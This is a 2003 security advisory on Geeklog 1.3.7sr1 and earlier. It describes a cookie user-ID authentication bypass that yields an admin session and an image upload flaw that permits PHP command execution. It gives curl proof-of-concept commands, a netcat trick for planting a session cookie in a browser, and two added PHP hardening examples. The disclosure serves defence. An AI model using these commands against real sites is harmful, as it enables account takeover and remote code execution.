Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
              shaharil_at_scan-associates.net
              munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your 
own virtual community area, complete with user administration, story posting, 
messaging, comments, polls, calendar, weblinks, and more! It can run on many 
different operating systems, and uses PHP4 and MySQL.

Details
=======
i) SQL integer manipulation in the authentication script.

from lib-sessions.php line 128 ------------------------------------------------

       if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
           // Session cookie doesn't exist but a perminant cookie does.
           // Start a new session cookie;
           if ($_SESS_VERBOSE) {
               COM_errorLog('perm cookie found from lib-common.php',1);
           }

           $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']]; 
           $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

           //echo $userid;

           $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

           if ($cookie_password <> $userpass) {  
               // User could have modified UID in cookie, don't do shit

           } else {
               if ($userid) {
                   $user_logged_in = 1;
                   //echo $userid;
                   // Create new session and write cookie
                   $sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                   SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
                   $userdata = SESS_getUserDataFromId($userid);
                   $_USER = $userdata;
               }
           }
       }

------------------------------------------------------------------------

In this case,
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd from $_TABLES['users'] where uid=$userid"

When we supply a non-existent user ID, we can bypass the ($cookie_password <> $userpass)
check, because both $userpass and $cookie_password will be null.

example:
	curl -b geeklog=9999 http://blablaba/users.php



SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
will then execute the SQL query
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

A valid session for user 9999, which does not exist, is inserted into the database.

Integer manipulation to get admin access
----------------------------------------
By supplying a floating point number as the user ID, a user can easily log in as any
Geeklog user. This is because uid is an integer column in the database: a floating point
value such as 2.1 matches no user row, so $userpass is always null (non-existent user)
and the password check is passed, yet when 2.1 is inserted into the integer column of
the sessions table it is stored as 2.

proof of concept:
	curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

header.txt will contain a valid session for the admin user.
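A hardened form of the permanent-cookie check, written as an added example for this advisory and not Geeklog's own fix: the user ID must be a plain decimal integer before it reaches SQL, the password cookie must be present and non-empty, the user row must actually exist, and the comparison is strict. The cookie name "geeklog_pw", the lookup closure and the sample user table are constructed for the example.

```php
<?php
// Added example, not Geeklog's code: a hardened form of the permanent-cookie
// check from lib-sessions.php. Returns the validated uid, or null on any doubt.
function validate_perm_cookie(array $cookies, string $name, string $pwname, callable $lookup_passwd): ?int
{
    if (!isset($cookies[$name], $cookies[$pwname])) {
        return null;                 // both cookies are required
    }
    $raw = (string) $cookies[$name];
    // Only a plain positive decimal integer is accepted: "9999" is well-formed,
    // "2.1" is rejected outright. This closes the float case (2.1 matches no
    // user row, yet MySQL stores it as uid 2) and keeps SQL metacharacters out.
    if (!preg_match('/^[1-9][0-9]*$/', $raw)) {
        return null;
    }
    $uid = (int) $raw;
    $cookie_password = (string) $cookies[$pwname];
    if ($cookie_password === '') {
        return null;                 // an empty password must never match
    }
    $userpass = $lookup_passwd($uid);   // null when the user does not exist
    if ($userpass === null || $userpass === '') {
        return null;                 // unknown user: no "null <> null" bypass
    }
    // Strict, constant-time comparison instead of the loose <> test.
    if (!hash_equals($userpass, $cookie_password)) {
        return null;
    }
    return $uid;
}

// Constructed sample user table standing in for $_TABLES['users'].
// In real code the lookup runs a prepared statement with $uid bound as an int.
$users = [2 => 'constructed-password-hash-for-admin'];
$lookup = function (int $uid) use ($users): ?string {
    return $users[$uid] ?? null;
};

// The advisory's cases against the hardened check (cookie names assumed):
var_dump(validate_perm_cookie(['geeklog' => '9999'], 'geeklog', 'geeklog_pw', $lookup));
// rejected: no password cookie and no such user
var_dump(validate_perm_cookie(['geeklog' => '2.1', 'geeklog_pw' => ''], 'geeklog', 'geeklog_pw', $lookup));
// rejected: "2.1" is not an integer and the password is empty
var_dump(validate_perm_cookie(['geeklog' => '2', 'geeklog_pw' => $users[2]], 'geeklog', 'geeklog_pw', $lookup));
// accepted: a genuine permanent cookie for uid 2
```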


ii) Upload image with any extension.

There is a lack of error checking in the image upload scripts (users and stories
modules): a user can upload a valid image with any extension, and the user-supplied
extension is used as the extension of the stored image. By embedding PHP code in the
image, a user can execute any command as the apache user on the remote server.

proof of concept:
	i)  Upload the attached file to the server using "Internet Explorer", which
	    uses the file header to generate the MIME type for the uploaded file.
	ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php
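A hardened upload naming step, added here as an example for this advisory rather than Geeklog's own fix: the stored extension comes from an allowlist keyed on the detected image type, and the basename is generated server-side. safe_image_name and the two sample files are constructed for the example.

```php
<?php
// Added example, not Geeklog's code: the stored name of an uploaded image is
// derived from the file's content, never from the client's filename or the
// browser-supplied MIME type. Returns the safe name, or null if not an image.
function safe_image_name(string $tmp_path): ?string
{
    // The extension is chosen from the detected type only (allowlist).
    $allowed = [
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    ];
    $info = @getimagesize($tmp_path);     // false when the content is not an image
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    // Server-generated basename: nothing the client sent (e.g. "x.php") survives.
    return bin2hex(random_bytes(8)) . '.' . $allowed[$info[2]];
}

// Constructed samples: a minimal 1x1 GIF, and a PHP script named like an image.
$gif = tempnam(sys_get_temp_dir(), 'img');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    . "!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;");
$script = tempnam(sys_get_temp_dir(), 'img');
file_put_contents($script, "<?php echo 'not an image';");

var_dump(safe_image_name($gif));     // accepted: a random basename with a .gif extension
var_dump(safe_image_name($script));  // rejected: the content is not an image
unlink($gif);
unlink($script);
```

A polyglot file that is a valid GIF with PHP appended still passes the type check; what defeats the attack in this advisory is that the stored name always carries an image extension, so the web server never hands the file to the PHP interpreter. Keeping the images directory free of any PHP handler is the complementary server-side control.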


Vendor Response
===============
The vendor was contacted on 19/05/2003 and a fixed version is available at
http://www.geeklog.net


Tips
====
A simple way to trick Mozilla into storing a session cookie for any site.

i) Edit header.txt.

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT; path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------

ii) Using netcat:
	# nc -l -p 9090 < header.txt

iii) Set your Mozilla HTTP proxy server to 127.0.0.1:9090

iv) Browse to http://blablaba.com/

v) Unset the proxy and browse to http://blablabla.com